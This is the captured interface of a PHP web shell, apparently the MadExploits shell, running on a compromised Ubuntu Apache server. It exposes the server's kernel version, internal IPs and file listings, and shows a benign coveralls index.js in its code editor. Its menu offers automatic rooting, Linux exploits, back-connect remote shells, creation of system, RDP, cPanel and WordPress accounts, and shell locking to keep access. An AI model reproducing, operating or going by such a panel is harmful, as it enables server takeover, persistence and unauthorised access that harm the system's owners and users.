Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
coveralls /
[ HOME SHELL ]
Name
Size
Permission
Action
bin
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
index.js
722
B
-rw-r--r--
package.json
2.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
'use strict'; const minimist = require('minimist'); // this needs to go before the other require()s so that // the other files can already use index.options module.exports.options = minimist(process.argv.slice(2), { boolean: [ 'verbose', 'stdout' ], alias: { 'v': 'verbose', 's': 'stdout' } }); module.exports.convertLcovToCoveralls = require('./lib/convertLcovToCoveralls'); module.exports.sendToCoveralls = require('./lib/sendToCoveralls'); module.exports.getBaseOptions = require('./lib/getOptions').getBaseOptions; module.exports.getOptions = require('./lib/getOptions').getOptions; module.exports.handleInput = require('./lib/handleInput'); module.exports.logger = require('./lib/logger');
Close